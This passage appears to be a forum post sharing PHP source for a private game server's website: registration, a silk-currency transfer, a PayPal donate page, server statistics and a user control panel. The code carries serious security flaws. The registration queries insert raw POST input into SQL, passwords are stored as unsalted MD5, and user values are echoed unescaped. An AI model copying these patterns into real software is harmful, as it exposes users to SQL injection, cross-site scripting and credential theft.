                core::$sql -> exec("insert into TB_User(StrUserID,password,reg_ip,sec_content,sec_primary, email) values('$_POST[username]','".md5($_POST['pass1'])."','".$_SERVER['REMOTE_ADDR']."','3','3','$_POST[email]')");
                $nJID = user::accountJIDbyUsername($_POST['username']);
                $szAvatarDefault = "img/noavatar.png";
                core::$sql -> exec("insert into srcms_userprofiles(JID,gender,skype,sec_question,sec_answer,avatar,whois, ispublic) values('$nJID','0','None','$_POST[sec_question]','$_POST[sec_answer]','$szAvatarDefault','user','1')");
                core::$sql -> exec("insert into SK_Silk(JID,silk_own,silk_gift,silk_point) values('$nJID','".$core -> aConfig['startSilk']."','0','0')");
                
                if(isset($_SESSION['ref']))
                {
                    if($_SESSION['ref'] == $_SESSION['username'])
                    {
                        echo "<br/>You can't be refferer for your own account (but account created).<br/>";
                        return;
                    }
                    $reffererJID = user::accountJIDbyUsername($_SESSION['ref']);
                    if($reffererJID > 0)
                    {
                        $nRefIPs = core::$sql -> numRows("select * from srcms_refferals where IP='".$_SERVER[REMOTE_ADDR]."'");
                        if($nRefIPs < $core -> aConfig['maxRefAccIP'])
                        {
                            $datetime = gmDate('Y-m-d H:i:s');
                            core::$sql -> exec("insert into srcms_refferals(reffererJID,invitedUserJID,time,ip) values('$reffererJID','$nJID','$datetime','$_SERVER[REMOTE_ADDR]')");
                            unset($_SESSION['ref']);
                        }
                    }
                }
                $sName = $core -> aConfig['serverName'];
                @mail($_POST['email'],"Thanks for registering at $sName","Thanks for registering at $sName, we really hope you will have a great fun playing here.","From:$noreply@$sName");?>
                
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Register</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Registration</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post">
                <h3>Register a new account</h3>
                <p>You have successfully registered you account, thank you for joining Rival-Online.</p>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->
                <?php misc::redirect("?pg=Home", 5);
            }
        }
    }
    else
    {
        //todo:add ajax validator
?>
<!--=== Content Part ===-->
<div class="body">
    <div class="breadcrumbs margin-bottom-50">
        <div class="container">
            <h1 class="color-green pull-left">Register</h1>
            <ul class="pull-right breadcrumb">
                <li><a href="/">Home</a> <span class="divider">/</span></li>
                <li><a href="">Pages</a> <span class="divider">/</span></li>
                <li class="active">Registration</li>
            </ul>
        </div><!--/container-->
    </div><!--/breadcrumbs-->

    <div class="container">        
        <div class="row-fluid margin-bottom-10">
            <form class="reg-page" method="post" role="form">
                <h3>Register a new account</h3>
                                                                                    <div class="controls">
                            <label>Username <span class="color-red">*</span></label>
                            <div class="input-prepend">
                                <span class="add-on"><i class="icon-user"></i></span>
                                <input type="text" name="username" autocomplete="off" maxlength="16" placeholder="User Name" style="width: 165%" class=""/>
                            </div>
                            
                            <label>Email Address <span class="color-red">*</span></label>
                            <div class="input-prepend">
                                <span class="add-on"><i class="icon-envelope"></i></span>
                                <input type="email" name="email" autocomplete="off" maxlength="54" placeholder="Email" style="width: 165%" class=""/>
                            </div>
                        </div>
                        <div class="controls">
                            <div class="span6">
                                <label>Password <span class="color-red">*</span></label>
                                <div class="input-prepend">
                                    <span class="add-on"><i class="icon-lock"></i></span>
                                    <input type="password" name="pass1" autocomplete="off" maxlength="32" placeholder="Password" style="width: 80%" class=""/>
                                </div>
                            </div>
                            <div class="span6">
                                <label>Confirm Password <span class="color-red">*</span></label>
                                <div class="input-prepend">
                                    <span class="add-on"><i class="icon-lock"></i></span>
                                    <input type="password" name="pass2" autocomplete="off" maxlength="32" placeholder="Confirm Password" style="width: 80%" class=""/>
                                </div>
                            </div>
                        </div>
                        <div class="controls">
                            <label>Security Question <span class="color-red">*</span></label>
                            <div class="input-prepend">
                                    <span class="add-on"><i class="icon-question-sign"></i></span>
                                    <input type="text" autocomplete="off" maxlength="16" placeholder="Security Question" name="sec_question" style="width: 165%" class=""/>
                            </div>
                            <label>Security Answer <span class="color-red">*</span></label>
                            <div class="input-prepend">
                                    <span class="add-on"><i class="icon-info-sign"></i></span>
                                    <input type="text" autocomplete="off" maxlength="16" placeholder="Security Answer" name="sec_answer" style="width: 165%" class=""/>
                            </div>
                        </div>
                        <!--div>
                            <label>Are you human ? <span class="color-red">*</span></label>
                            <script type="text/javascript">
                             var RecaptchaOptions = {
                                theme : 'clean'
                             };
                             </script>
                             
                            <center><script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LeBrO8SAAAAAHKPgsJuYPS1vViiXLElqixSq3zc"></script>
                            <noscript>
                                <iframe src="http://www.google.com/recaptcha/api/noscript?k=6LeBrO8SAAAAAHKPgsJuYPS1vViiXLElqixSq3zc" height="300" width="500" frameborder="0"></iframe><br/>
                                <textarea name="recaptcha_challenge_field" rows="3" cols="40"></textarea>
                                <input type="hidden" name="recaptcha_response_field" value="manual_challenge"/>
                            </noscript></center>
                            <br>
                        </div-->
                        <div class="controls form-inline">
                            <label class="checkbox"><input type="checkbox" />&nbsp; I read <a href="?pg=tos">Terms and Conditions</a></label>
                            <input type="submit" name="submit" class="btn-u pull-right" value="Register">
                        </div>
                        <hr />
                        <p>Already Signed Up? Click <a href="?pg=Login" class="color-green">Sign In</a> to login your account.</p>
                                                           </form>
        </div><!--/row-fluid-->
    </div><!--/container-->        
</div><!--/body-->
<!--=== End Content Part ===-->
<?php 
    }
?>

rules

كود PHP:

<table border='1' id='table-3' cellpadding='0' cellspacing='0'>
<tr>
<td>1. Botting is allowed! (Gold Botting with or without Proxies is forbidden)</td>
</tr>
<tr>
<td>2. The Team should be treated with respect! rules must be followed!</td>
</tr>
<tr>
<td>3. Don't insult other Players, be friendly!</td>
</tr>
<tr>
<td>4. Begging for Items or Events is not allowed!</td>
</tr>
<tr>
<td>5. PK2 Editing are completely forbidden!</td>
</tr>
<tr>
<td>6. If you found a bug , you must report it and not use it.!</td>
</tr>
<tr>
<td>7. Murder on Events is not allowed!</td>
</tr>
</table> 


sendsilks

كود PHP:

<?php
function check_pers ($per,$total){
  //  $num = ceil($snum);
    $total = ceil($total);
    $num = ceil($total * $per) / 100 ;
    return ($num);
} 
    if (isset($_POST['sendsilk'])) {

    //    $user = $sec->secure($_POST['username']);
        $email = security::secure($_POST['name']);
        $amont = security::secure($_POST['amont']);
        //$check = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$user."'");
        if (empty($_POST['amont']) || (empty($_POST['name']) )) {
            echo 'Error:';
            echo '<br />';
            echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
            unset($_POST['sendsilk']);
                    }


            if(user::accountExists($email) == 1) {
                        echo '
                        Error
                        <br />
                        <form  method="POST">
                        <label><span style="color: red;font-weight:bold;font-size: medium;"> character name !!! </span></label>
                        ';
                    } else {
                        $IDs = user::accountJIDbyUsername($_SESSION['username']);
                        $silk_own = user::getSilkByUsername($IDs);
            if (($_POST['amont']) > $silk_own) {
                    echo 'Error :';
                    echo '<br />';
                    echo "You do not have $amont silk";
                    } else {
            if (($_POST['amont']) < 10) {
            
                    echo '
           Error
           <br />
            <form   method="POST">
            <label><span style="color: red;font-weight:bold;font-size: medium;"> You can`t send less than 10 silk !!! </span></label>
            ';
                    } else {
                    if (($_POST['name']) == ($_SESSION['username'])) {
            
                                        echo '
            <div class="top">Error</div>
            <br />
            <form    method="POST">
            <label>You can`t send to <span style="color: red;font-weight:bold;font-size: medium;"> '.($_SESSION['username']).'</span></label>
            ';
                    } else {
                    function check_($val)
                        {
                        if( $val % 2 == 0 )
                            {
                        return false;
                        }
                        else
                        {
                        return true;
                        }
                    }
                    if (check_($amont)) {
            
                        echo '<div id="content">
            <div class="top">Error</div>
            <div class="content">
            <div id="content" class="content-inner">
            <form    method="POST">
            <div class="reg">
            <label><span style="color: red;font-weight:bold;font-size: medium;">$amont is an odd number ... No single number can be written so that a discount of 10% of the figure</span></label>
            </div>
            </div>
            </div>
            <div class="bottom"></div>
            </div>
            </div>
            ';
                    } else {
                    $per = $amont;
                        $num = 10;
                        $nsba100 = check_pers($per,$num); 
                        $checkID = user::accountJIDbyUsername($email);
                        $silk_own = user::getSilkByUsername($IDs);
                         while ($row = mssql_fetch_array($checkID)) {
                        $IDs = $row['JID'];
                        }
                        $checkID = user::accountJIDbyUsername($_SESSION['username']);
                         while ($row = mssql_fetch_array($checkID)) {
                        $IIDs = $row['JID'];
                        core::$sql -> exec("update SK_Silk set silk_own = silk_own - '".$amont."' WHERE JID = '".$IIDs."'");
                        core::$sql -> exec("update SK_Silk set silk_own = silk_own + '".$amont."' - '".$nsba100."' WHERE JID = '".$IDs."'");
                        }
                            echo '
                            sent successfully !
                            <br />
                            <form   method="POST">
                            <br />
                            <label><span style="color: green;font-weight:bold;font-size: medium;">'.$amont.' silks sent successfully</span></label>
                            ';
                    }
                }
            }
        }
    }
}
     else {
        //}    
    //    $user = $sec->secure($_POST['username']);
        //$check = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$user."'");
                        $checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
                         while ($row = mssql_fetch_array($checkID)) {
                        $IDs = $row['JID'];
                        }
                        $silk_own = user::getSilkByUsername($IDs);
        echo '
            Send Silk system .
            <form  name="registerform" id="formID" method="post" autocomplete="off" >
                        <span style="color: #FF0000;font-weight:bold; font-size:  15px; ">    10%</span> <span style="font-weight:bold; font-size:  15px; ">will be deducted from the Silk sender</span><br /><br />

                                            <table width="70%" style="text-align:center;align:center;margin-left:15%;">
                <tr>
                    <td >        <br /><p style="font-size : 13px;"> Enter your Silk :</p></td>
                    <td >        <br /><p style="font-size : 13px;"><input  type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;"  name="amont" value=""  /></p></td>
                </tr>
                <tr>
                    <td >        <br /><p style="font-size : 13px;"> Send To (Username) :</p></td>
                    <td >        <br /><p style="font-size : 13px;"><input type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;"  name="name" value=""  /></p></td>
                </tr>
            </table>

        
                <table>
                <td >
                <br/><input style="height:32px;vertical-align:middle;margin-left: 150px;" class="submitButton" type="submit" value="send silk" name="sendsilk" />
                </td>
                </table>
';
}
?>

sendsilks1

كود PHP:

<?php

core::$sql -> changeDB("acc");

function check_pers($per,$total){
//  $num = ceil($snum);
$total = ceil($total);
$num = ceil($total * $per) / 100 ;
return ($num);
} 
if (isset($_POST['sendsilk'])) {

$useridnum = security::secure($_POST['name']);
$amount = security::secure($_POST['amount']);
if (empty($_POST['amount']) || (empty($_POST['name']) )) {
echo 'Error:<br />';
echo "You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>";
unset($_POST['sendsilk']);
}
core::$sql -> changeDB("acc");
$checkcs = core::$sql -> numRows("SELECT * FROM TB_User WHERE StrUserID = '".$useridnum."'");
if ($checkcs != 1) {
echo '
Error
<br />
<form method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;"> character name !!! </span></label>
<br />
';
} else {
core::$sql -> changeDB("acc");
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = core::$sql -> fetchArray($checkID)) {
$IDs = $row['JID'];
}
core::$sql -> changeDB("acc");
$querys = core::$sql -> exec("select * from SK_Silk where JID = '".$IDs."'");
while ($row = core::$sql -> fetchArray($querys)) {
$silk_own = $row['silk_own'];
}
if (($_POST['amount']) > $silk_own) {

echo 'Error :';
echo '<br />';
echo "You do not have $amount silk";
} else {
if (($_POST['amount']) < 10) {

echo '
Error
<form method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;"> You can`t send less than 10 silk !!! </span></label>
';
} else {
if (($_POST['name']) == ($_SESSION['username'])) {

echo '
Error:
<form method="POST">
<label>You can`t send to <span style="color: red;font-weight:bold;font-size: medium;"> '.($_SESSION['username']).'</span></label>
';
} else {
function check_($val)
{
if( $val % 2 == 0 )
{
return false;
}
else
{
return true;
}
}
if (check_($amount)) {

echo '
Error
<br />
<form   method="POST">
<label><span style="color: red;font-weight:bold;font-size: medium;">$amount is an odd number ... No single number can be written so that a discount of 10% of the figure</span></label>
';

} else {
core::$sql -> changeDB("acc");
$per = $amount;
$num = 10;
$nsba100 = check_pers($per,$num); 
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$useridnum."'");
while ($row = core::$sql -> fetchArray($checkID)) {
$IDs = $row['JID'];
}
core::$sql -> changeDB("acc");
$checkIID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = core::$sql -> fetchArray($checkIID)) {
$IIDs = $row['JID'];
core::$sql -> changeDB("acc");
core::$sql -> exec("update SK_Silk set silk_own = silk_own - '".$amount."' WHERE JID = '".$IIDs."'");
core::$sql -> exec("update SK_Silk set silk_own = silk_own + '".$amount."' - '".$nsba100."' WHERE JID = '".$IDs."'");
}
echo '
successfully
<form   method="POST">
<label><span style="color: green;font-weight:bold;font-size: medium;">Send '.$amount.' silk successfully</span></label>
';
}
}
}
}
}
}
else {
core::$sql -> changeDB("acc");
$checkID = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".($_SESSION['username'])."'");
while ($row = core::$sql -> fetchArray($checkID)) {
$IDs = $row['JID'];
}
core::$sql -> changeDB("acc");
$querys = core::$sql -> exec("select * from SK_Silk where JID = '".$IDs."'");
while ($row = core::$sql -> fetchArray($querys)) {
$silk_own = $row['silk_own'];
}
echo '
Send Silk System
<form name="registerform" id="formID" method="post" autocomplete="off" >

<span style="color: #FF0000;font-weight:bold; font-size:  15px; ">    10%</span> <span style="font-weight:bold; font-size:  15px; ">will be deducted from the Silk sender</span><br /><br />
<table width="70%" style="text-align:center;align:center;margin-left:15%;">
<tr>
<td ><br /><p style="font-size : 13px;"> Enter your Silk :</p></td>
<td ><br /><p style="font-size : 13px;"><input class="validate[required,custom[onlyNumberSp],minSize[0],maxSize[14],ajax[ajaxUserCallPhpSilk]] textboxt" type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;"  name="amount" value=""  /></p></td>
</tr>
<tr>
<td ><br /><p style="font-size : 13px;"> Send To (Username) :</p></td>
<td ><br /><p style="font-size : 13px;"><input type="text" maxlength="16" style="border-radius: 6px 6px 6px 6px;"  name="name" value="" class="validate[required,minSize[4],maxSize[16]] textboxt"  /></p></td>
</tr>
</table>


<table>            <td ><br/>    <input style="height:32px;vertical-align:middle;margin-left: 150px;" class="submitButton" type="submit" value="send silk" name="sendsilk" /></td>
</table>

</form>            

';
}
?>

shop

كود PHP:

    <?php
    global $core;
    $servername = $core -> aConfig['serverName'];
    $getsiteurl = $_SERVER['SERVER_NAME'];
    $username = $_SESSION['username'];
    ?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Donate</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Donate</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
<table width='100%' height='422' border='1' align='center' cellpadding='0' cellspacing='0'>
    <tbody>
<form name='_xclick' action='https://www.paypal.com/cgi-bin/webscr' method='post'>
    <input type='hidden' name='cmd' value='_xclick' />
    <input type='hidden' name='business' value='[email protected]' />
    <input type='hidden' name='currency_code' value='USD' />
    <input type='hidden' id='input' name='custom' value='<?php echo $username;?>' />
    <input type='hidden' name='item_name' value='Rival-Online Online Goods - Virtual Points in [<?php echo $servername;?>] User :[<?php Echo $username;?>] '/>
    Hello <font style='color:red;'><?php echo $username;?> </font>, Please Choose the Amount of Silks: <br />
<select style='color:red;background: rgba(0,0,0,4.0);width:250px;' name='amount'>
    <option style='color:red' value='5' name='1 x 300 Silk (USD 5.00)'>300 Silk (USD 5.00)
    <option style='color:red' value='10' name='1 x 700 Silk (USD 10.00)'>700 Silk (USD 10.00)
    <option style='color:red' value='15' name='1 x 1100 Silk (USD 15.00)'>1100 Silk (USD 15.00)
    <option style='color:red' value='25' name='1 x 2000 Silk (USD 25.00)'>2000 Silk (USD 25.00)
    <option style='color:red' value='50' name='1 x 4500 Silk (USD 50.00)'>4500 Silk (USD 50.00)
</select>
    <input type='hidden' name='return' value='http://<?php echo $getsiteurl;?>/?pg=news'>
    <input type='hidden' name='notify_url' value='http://<?php echo $getsiteurl;?>/module/ipn.php'>
    <input style='width: 99px;vertical-alignt:midle;border:none;' type='image' src='http://www.paypalobjects.com/en_US/i/btn/btn_buynow_LG.gif' name='submit' alt='PayPal - The safer, easier way to pay online!' />
</form>
    <br /><br />
    <b>Before you continue with the silks charge you must agree that you wont ChargeBack and also that you read those Terms of Use :</b><br />
    <a href='?pg=tos'>Terms and Conditions</a>
    </tbody>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->

stats_menu

كود PHP:

<?php
$data = $core -> aConfig;
$hGwStatus = @fsockopen($data['serverIP'], $data['gatewayPort'], $errno, $errstr, 0.3);
$hGsStatus = @fsockopen($data['serverIP'], $data['gamePort'], $errno, $errstr, 0.3);
$hStatuses = array();
$onlineImg = "<img src='img/status/online.gif' />";
$offlineImg = "<img src='img/status/offline.gif' />";
if($hGwStatus) { $hStatuses['gw'] = $onlineImg; }
else { $hStatuses['gw'] = $offlineImg; }

if($hGsStatus) { $hStatuses['gs'] = $onlineImg; }
else { $hStatuses['gs'] = $offlineImg; }

$nOnlinePlayers = misc::getOnlinePlayersCount();
core::$sql -> changeDB('acc');
$nAccounts = core::$sql -> getRow("select count(*) from TB_User");
$nPlayersMax = core::$sql -> getRow("SELECT top 1 nUserCount FROM _ShardCurrentUser WHERE nShardID = '".$core -> aConfig['shardID']."' ORDER BY nUserCount desc");

core::$sql -> changeDB('shard');

$nChars = core::$sql  -> getRow("select count(*) from _Char");
$nGuilds = core::$sql  -> getRow("select count(*) from _Guild");

core::$sql  -> changeDB('acc');

echo " 
        <hr>
        <b> Server info :</b><br/>
        <hr>
        Players online: <font color='green'>$nOnlinePlayers/$data[playersLimit]</font><br/>
        Max online: <font color='green'>$nPlayersMax</font><br/>
        Experience rate: <font color='green'>$data[expRate]</font><br/>
        Party Experience rate: <font color='green'>$data[partyExpRate]</font><br/>
        Gold drop coeficent: <font color='green'>$data[goldDropRate]</font><br/>
        Item drop coeficent: <font color='green'>$data[itemDropRate]</font><br/>
        <hr>
        <b>Status :</b><br/>
        <hr>
        Gateway Server: $hStatuses[gw]<br/>
        Game Server: $hStatuses[gs]<br/>
        Accounts: <font color='green'>$nAccounts</font><br/>
        Characters: <font color='green'>$nChars</font><br/>
        Guilds: <font color='green'>$nGuilds</font>
        ";
?>

ucp

كود PHP:

<?php     
     global  $core;
     
     if(isset($_SESSION['username']))
     {
         
        //core::$ucp -> showMenu();
        #echo "You are logged in as <b>$_SESSION[username]</b>.<br/><br/>";
        
        if(isset($_GET['act']))
        {
            switch($_GET['act'])
            {
                case('changepw'):
                {
                    //module disabled
                    if($core -> aConfig['allowChangePw'] == 0) 
                    {
                        echo $core -> aConfig[0];
                        echo "This module is currently disabled.";
                        return;
                    }
            
                    if(isset($_POST['submit']))
                    {
                        //process data
                        if(!security::isSecureString($_POST['password_old'], 3)) $errors[] = "Password [old] contains forbidden symbols";
                        if(!security::isSecureString($_POST['password_new'], 3)) $errors[] = "Password [new] contains forbidden symbols";
                        if(strlen($_POST['password_old']) > 32) $errors[] = "Password [old] too long";
                        if(strlen($_POST['password_old']) < 6)    $errors[] = "Password [old] too short";
                        if(strlen($_POST['password_new']) > 32)    $errors[] = "Password [new] too long";
                        if(strlen($_POST['password_new']) < 6)    $errors[] = "Passwrod [new] too short";
                        if($_POST['password_new'] !== $_POST['password_new_confirm']) $errors[] = "New Passwords does not match!.";
                        
                        if(count($errors) > 0)
                        {
                            foreach($errors as $nElement)
                            {
                                echo $nElement.".<br/>";
                            }
                            misc::back();
                        }
                        else
                        {
                            //verify
                            if(user:: changePassword($_SESSION['username'], $_POST['password_old'], $_POST['password_new']))
                            {
                                echo "Password changed successfully. <br/>";
                                misc::redirect('?pg=ucp', 1);
                            }
                            else
                            {
                                echo "Invalid old password specified.<br/>";
                                misc::back();
                            }
                        }
                    }
                    else core::$ucp -> showChangepwForm();
                }
                break;
                
                case('logout'):
                {
                    if(user::logout())
                    {
                        echo "Successfully logged out. Redirecting.<br/>";
                        misc::redirect('?pg=Home', 1);
                    }
                    else
                    {
                        echo "Failed to logout.<br/>";
                    }
                }
                break;
                
                case('refferals'):
                {
                    
                    if($core -> aConfig['allowRefferals'] == 0) 
                    {
                        echo "This module is currently disabled.";
                        return;
                    }
                
                
                    
                    $hQuery = mssql_query("select invitedUserJID,time,bonusAdded from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                    $nCount = core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                    echo "You can reffer [<b>".$core -> aConfig['maxRefAccIP']."</b>] accounts with same ip address [limit].<br/><br/>";
                    
                    if($nCount == 0)
                    {
                        echo "<br/>You didn't reffer anyone yet.</br>";
                    }
                    else
                    {
                        echo "
                        <table id='table-3' border='1' cellpadding='0' cellspacing='0'>
                        <td>Username</td><td>Time</td>";
                        if($core -> aConfig['allowRefferalsBonus'] == 1)
                        {
                            echo "<td>Bonus status</td>";
                        }
                        echo "</tr>";
                        
                        
                        while($row = mssql_fetch_array($hQuery))
                        {
                            echo "<td><a href='?pg=viewprofile&username=".user::usernamyByJID($row[invitedUserJID])."'>".user::usernamyByJID($row[invitedUserJID])."</a></td><td>$row[time]</td>";
                            if($core -> aConfig['allowRefferalsBonus'] == 1)
                            {
                                if($row['bonusAdded'] == 1)
                                {
                                    echo "<td>Applied</td>";
                                }
                                else echo "<td>Not applied</td>";
                            }
                            echo "</tr>";
                        }
                        
                        if($core -> aConfig['allowRefferalsBonus'] == 1)
                        {
                            if($_GET['do'] == 'receive_bonus')
                            {
                                $nSilk = $core -> aConfig['refferalsBonusSilk'] * core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."' and bonusAdded='0'");
                                core::$sql -> exec("update srcms_refferals set bonusAdded='1' where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."'");
            
                                user::addSilk($_SESSION['username'], $nSilk);
                                echo "<br/><b>You received your bonuses.</b><br/>";
                                misc::redirect("?pg=Home", 1);
                            }
                            else
                            {
                                $nSilk = $core -> aConfig['refferalsBonusSilk'] * core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."' and bonusAdded='0'");
                                if(($core -> aConfig['refferalsBonusSilk'] * $nSilk) > 0)
                                {
                                    echo "</table><br/>Bonus: [".$core -> aConfig['refferalsBonusSilk']."] silk per refferal<br/>Total amount of users reffered by you: <b>$nCount</b><br/><br/><a href='?pg=ucp&act=refferals&do=receive_bonus'>Receive bonus silk [".$core -> aConfig['refferalsBonusSilk'] * core::$sql -> numRows("select * from srcms_refferals where reffererJID='".user::accountJIDbyUsername($_SESSION['username'])."' and bonusAdded='0'")."]";
                                }
                            }
                        }
                        else echo "<br/>You can't receive any bonus for refferals at the moment.<br/>";
                        
                        
                    }
                    
                }
                break;
                case('mailbox'):
                {
                 //module disabled
                    if($core -> aConfig['allowMailbox'] == 0) 
                    {
                        echo "This module is currently disabled.";
                        return;
                    }
                    
                    echo "<br/><a href='?pg=ucp&act=mailbox&newmsg' class='btn-u'>Write a new message</a><br/><br/>";
                    
                    if(isset($_GET['newmsg']))
                    {
                        if(!isset($_POST['submit']))
                        {
                            core::$ucp -> showSendWebMsgForm();
                        }
                        else
                        {
                            //process send msg data
                            if(!security::isSecureString($_POST['recvName'], 3)) $errors[] = "Receiver username contains forbidden symbols";
                            if(strlen($_POST['recvName']) > 16) $errors[] = "Receiver username too long";
                            if(strlen($_POST['recvName']) < 3)    $errors[] = "Receiver username too short";
                            if(strlen($_POST['msgTitle']) > $core -> aConfig['maxPrivMsgTitleLen']) $errors[] = "Message title too long";
                            if(strlen($_POST['msgText']) > $core -> aConfig['maxPrivMsgBodyLen']) $errors[] = "Message body too long";
                            if(strlen($_POST['msgTitle']) < $core -> aConfig['minPrivMsgTitleLen']) $errors[] = "Message title too short";
                            if(strlen($_POST['msgText']) < $core -> aConfig['minPrivMsgBodyLen'])    $errors[] = "Message body too short";
                            
                            if(count($errors) > 0)
                            {
                                foreach($errors as $nElement)
                                {
                                    echo $nElement.".<br/>";
                                }
                                misc::back();
                            }
                            else
                            {
                                //db
                                //user::sendWebPrivMsg($to, $from, $title, $text)
                                if(user::accountExists($_POST['recvName']))
                                {
                                    user::sendWebPrivMsg($_POST['recvName'], $_SESSION['username'], $_POST['msgTitle'], $_POST['msgText']);
                                } 
                                else 
                                {
                                    echo "Account with such username not found.<br/>";
                                    misc::back();
                                }
                            }
                        }
                        //lol
                        echo "<br/><br/>";
                    }
                    
                    $myJID = user::accountJIDbyUsername($_SESSION['username']);
                
                    $nMsgCount = core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID'");
                    
                    if(isset($_GET['view']))
                    {
                        $nMsgID = (int)$_GET['view'];
                        if(core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID' and id='$nMsgID'") > 0)
                        {
                            $msgData = core::$sql -> fetchArray("select * from srcms_privatemessages where id='$nMsgID'");
                            $msgData['msg'] =  security::fromHTML($msgData['msg']);
                            $msgData['msg'] =  misc::applyAttributesToText($msgData['msg']);
                            $szSender = user::usernamyByJID($msgData['sender']);
                            echo "<br/><table id='table-3' width='380' border='1' cellpadding='0' cellspacing='0'>
                                    <td>Title</td><td>$msgData[title]</td></tr>
                                    <td>From</td><td><a href='?pg=viewprofile&username=$szSender' class='btn-u'>$szSender</a></td></tr>
                                    <td height='50'>Text</td><td width='300' height='50'>$msgData[msg]</td>
                                    </table>
                                 ";
                            core::$sql -> exec("update srcms_privatemessages set viewed='1' where id='$nMsgID'");
                            echo "<br/><br/><br/>";
                        } else echo "You can't view message that does not belong to you.<br/>";
                    
                    }
                    
                    if($nMsgCount > 0)
                    {
                        if($nMsgCount == $core -> aConfig['maxPrivMsg']) echo "Your inbox is full. <br/>";
                        $hQuery = core::$sql -> exec("select * from srcms_privatemessages where receiver='$myJID' order by time desc");
                    
                        
                        echo "<table id='table-3' border='1' cellpadding='0' cellspacing='0'>
                            <td>From</td><td>Title</td><td>Time</td><td>Viewed</td><td>Link to view it</td><td>Delete</td></tr>";
                        while($row = mssql_fetch_array($hQuery))
                        {
                            $szSender = user::usernamyByJID($row['sender']);
                            
                            if($row['viewed'] == '1')  echo "<td><a href='?pg=viewprofile&username=$szSender' class='btn-u'>$szSender</a></td><td>$row[title]</td><td>$row[time]</td><td>Yes</td><td><a href='?pg=ucp&act=mailbox&view=$row[id]' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del=$row[id]' class='btn-u'>Delete</a></td></tr>";
                            else  echo "<td><b><a href='?pg=viewprofile&username=$szSender'>$szSender</a></b></td><td><b>$row[title]</b></td><td>$row[time]</td><td><b>No</b></td><td><a href='?pg=ucp&act=mailbox&view=$row[id]' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del=$row[id]' class='btn-u'>Delete</a></td></b></tr>";
                
                        }
                        echo "</table>";
                        
                        
                        if(isset($_GET['del']))
                        {
                            $nMsgID = (int)$_GET['del'];
                            if(core::$sql -> numRows("select * from srcms_privatemessages where receiver='$myJID' and id='$nMsgID'") > 0)
                            {
                                core::$sql -> exec("delete from srcms_privatemessages where receiver='$myJID' and id='$nMsgID'");
                                echo "<br/>Message deleted.<br/>";
                                misc::redirect("?pg=ucp&act=mailbox", 3);
                            } else echo "You can't delete message that does not belong to you.<br/>";
                            
                            
                        }
                    
                    

                    }
                    else echo "No messages in inbox";
                    }
                break;
                
                case('mychars'):
                
                {
                    //module disabled
                    if($core -> aConfig['allowListChars'] == 0) 
                    {
                        echo "This module is currently disabled.";
                        return;
                    }
                    
                    if(isset($_GET['charname']))
                    {
                        
                        
                        if(!security::isSecureString($_GET['charname'], 3))
                        {
                            echo "Invalid char name<br/>";
                            misc::back();
                            break;
                        }
                        
                    
                        if(user::usernameByCharname($_GET['charname']) != $_SESSION['username'])
                        {
                            
                            echo "This character is not yours !<br/>";
                            misc::back();
                            break;
                        }
                        
                        if(isset($_GET['charname']) && isset($_GET['char_act']))
                        {
                            switch($_GET['char_act'])
                            {
                                case('reset_pos'):
                                if($core -> aConfig['allowCharTeleport'] == 0)
                                {
                                    echo "This function is disabled.<br/>";
                                    break;
                                }
                                
                                if(!isset($_POST['submit']))
                                {
                                    echo "Your character got stuck ? If so, please, press the button. This costs ".$core -> aConfig['charTeleportGoldPrice']." gold.<br/>
                                        <form method='post'>
                                            <input type='submit' name='submit' value='RESET CHAR POSITION [$_GET[charname]]'><br/>
                                            </form>";
                                }
                                else
                                {
                                    core::$sql -> changeDB('shard');
                                    if(core::$sql -> getRow("select RemainGold from _Char where CharName16='$_GET[charname]'") > $core -> aConfig['charTeleportGoldPrice'])
                                    {
